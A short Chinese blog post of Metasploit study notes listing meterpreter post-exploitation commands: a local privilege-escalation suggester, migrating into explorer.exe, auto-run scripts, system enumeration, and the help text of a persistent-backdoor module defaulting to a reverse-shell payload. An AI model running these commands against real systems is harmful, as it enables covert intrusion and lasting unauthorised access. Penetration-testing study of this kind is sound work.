MSF学习笔记（11）

tianyazm

于 2018-02-12 10:43:01 发布

阅读量990

点赞数

CC 4.0 BY-SA版权

分类专栏： MSF学习笔记文章标签： MSF

本文链接：https://blog.youkuaiyun.com/tianyazm/article/details/79315228

本文是MSF学习笔记的一部分，主要涵盖了本地提权漏洞检测、信息收集、迁移到指定进程、创建持久后门以及利用mimikatz等技术。还讨论了WEB Delivery和远程文件包含漏洞的利用。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

搬迁到Minggle’Blog

###本地提权漏洞检测

meterpreter > run post/multi/recon/local_exploit_suggester

###迁移到指定进程

migrate -N explorer.exe

###自动脚本

msf exploit(multi/handler) > set AutoRunScript  migrate -n explorer.exe

msf exploit(multi/handler) > setInitialAutoRunScript  migrate -n explorer.exe
msf exploit(multi/handler) > set AutoRunScript  post/windows/gather/dumplinks		##migrate 到指定用户进程

###信息收集

meterpreter > run winenum

###持久后门

meterpreter > run persistence -h
OPTIONS:

    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tc